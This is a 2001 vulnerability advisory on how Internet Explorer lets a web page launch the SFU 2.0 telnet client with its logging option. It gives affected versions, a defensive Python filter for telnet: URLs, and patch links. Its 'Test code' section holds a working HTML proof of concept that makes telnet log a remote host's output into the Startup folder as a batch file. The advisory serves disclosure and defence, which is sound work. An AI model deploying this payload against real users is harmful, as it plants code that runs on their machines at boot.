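Services for Unix (SFU) 2.0 telnet client file overwrite vulnerability
Published: 2001-10-12
Updated: 2001-10-12
Severity: High
Threat level: Ordinary user access privileges
Error type: Design error
Exploitation mode: Server mode
Affected systems
Microsoft Internet Explorer 5.01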
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows 2000
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP6a
Microsoft Internet Explorer 5.0.1SP2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 2000
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000 SP2
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP6a
Microsoft Internet Explorer 5.0.1SP1
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 2000
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000 SP2
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP6a
Microsoft Internet Explorer 5.5SP2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98se
- Microsoft Windows ME
- Microsoft Windows 2000
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows NT Terminal Server
- Microsoft Windows NT 3.5.1
- Microsoft Windows NT 3.5.1SP1
- Microsoft Windows NT 3.5.1SP2
- Microsoft Windows NT 3.5.1SP3
- Microsoft Windows NT 3.5.1SP4
- Microsoft Windows NT 3.5.1SP5
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP6a
- Microsoft Windows NT Enterprise Server 4.0
Microsoft Internet Explorer 5.5SP1
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 2000
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000 SP2
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP6a
Microsoft Internet Explorer 5.5
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 2000
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000 SP2
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP6a
Microsoft Internet Explorer 6.0
- Microsoft Windows 98
- Microsoft Windows 98se
- Microsoft Windows ME
- Microsoft Windows 2000
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000 SP2
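- Microsoft Windows NT 4.0SP6a
Detailed description
This vulnerability is similar to the issue described in http://www.microsoft.com/technet/security/bulletin/MS01-015.asp and affects telnet sessions invoked through IE. By Microsoft's design, telnet sessions can be launched from IE, and a web page can make IE start telnet with an arbitrary command line. The telnet client shipped with SFU 2.0 provides a logging option that records everything exchanged during a telnet session.
An attacker can use this logging option when starting a session and then inject an executable file into a chosen location on the user's system, so that the file is executed the next time the user starts the machine, compromising the system. The flaw lies not in the telnet client itself but in IE, because the telnet client does not allow command-line arguments to be used remotely.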
Test code
<html>
<frameset rows="100%,*">
<frame src=about:blank>
<frame src=telnet:-f%20\Documents%20and%Settings\All%20Users
\start%20menu\programs\startup\start.bat%20host%208000>
</frameset>
</html>
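An added example, not part of the original advisory or any Microsoft code: a Python check that a mail or web content filter could run over HTML to flag `telnet:` URLs whose decoded body carries client options, such as the `-f` logging flag seen in the test code above. The sample HTML, host name and log path are constructed, and the set of URL-bearing attributes is an assumption.

```python
from html.parser import HTMLParser
from urllib.parse import unquote

# Assumption: attributes that commonly carry a URL the browser may launch.
URL_ATTRS = {"src", "href", "action", "data"}

def classify_telnet_url(raw):
    """Return details for a telnet: URL that carries client options, else None."""
    value = "".join(raw.split())                # undo line wraps inside the value
    scheme, sep, rest = value.partition(":")
    if not sep or scheme.lower() != "telnet":
        return None
    # After decoding, %20 becomes the separator between command-line arguments.
    arguments = unquote(rest.lstrip("/"))
    options = [tok for tok in arguments.split() if tok.startswith("-")]
    if not options:
        return None                             # plain telnet:host or telnet://host:port
    return {"options": options, "arguments": arguments,
            "logs_to_file": "-f" in options}    # -f: logging flag from the test code

class TelnetUrlAuditor(HTMLParser):
    """Collects every URL-bearing attribute that holds an option-carrying telnet: URL."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRS and value:
                hit = classify_telnet_url(value)
                if hit:
                    self.findings.append({"tag": tag, "attr": name, **hit})

def audit_html(html):
    auditor = TelnetUrlAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings

# Constructed sample page: host name, port and log path are placeholders.
SAMPLE_HTML = r"""<html><body>
<a href="telnet://host.example:23/">console</a>
<iframe src="telnet:-f%20C:\example\session.log%20host.example%208000"></iframe>
<img src="logo.png">
</body></html>"""

if __name__ == "__main__":
    for finding in audit_html(SAMPLE_HTML):
        print(finding)
```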
Solution
Download the patch:
www.microsoft.com/windows/ie/downloads/critical/q306121/default.asp
Related information
Reference: http://www.microsoft.com/technet/security/bulletin/MS01-051.asp